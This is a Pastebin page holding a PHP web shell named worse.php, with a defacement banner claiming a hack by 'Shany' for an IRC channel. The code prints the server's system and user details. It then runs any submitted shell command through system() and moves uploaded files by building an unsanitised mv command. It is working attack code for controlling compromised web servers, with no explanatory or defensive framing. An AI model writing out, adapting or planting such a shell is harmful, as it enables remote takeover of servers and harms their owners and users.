SHARE
TWEET

worse.php

a guest Nov 6th, 2011 158 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. set_magic_quotes_runtime(0);
  4.  
  5. print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
  6. print "<center><h1>#worst @dal.net</h1></center>";
  7. print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
  8. print "<center><h1>Watch Your system Shany was here.</h1></center>";
  9. print "<center><h1>Linux Shells</h1></center>";
  10. print "<hr><hr>";
  11.  
  12. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  13. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  14.  
  15. $UName  = `uname -a`;
  16. $SCWD   = `pwd`;
  17. $UserID = `id`;
  18.  
  19. if( $currentWD == "" ) {
  20.     $currentWD = $SCWD;
  21. }
  22.  
  23. print "<table>";
  24. print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
  25. print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
  26. print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
  27. print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
  28. print "</table>";
  29.  
  30. print "<hr><hr>";
  31.  
  32. if( $_POST['_act'] == "List files!" ) {
  33.     $currentCMD = "ls -la";
  34. }
  35.  
  36. print "<form method=post enctype=\"multipart/form-data\"><table>";
  37.  
  38. print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  39. print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  40.  
  41. print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  42. print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  43.  
  44. print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
  45. print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  46.  
  47. print "</table></form><hr><hr>";
  48.  
  49. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  50. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  51.  
  52. if( $_POST['_act'] == "Upload!" ) {
  53.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  54.         print "<center><b>Error while uploading file!</b></center>";
  55.     } else {
  56.         print "<center><pre>";
  57.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  58.         print "</pre><b>File uploaded successfully!</b></center>";
  59.     }    
  60. } else {
  61.     print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
  62.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  63.     system($currentCMD);
  64.     print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
  65. }
  66.  
  67. exit;
  68.  
  69. ?>
  70.  
  71.  
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top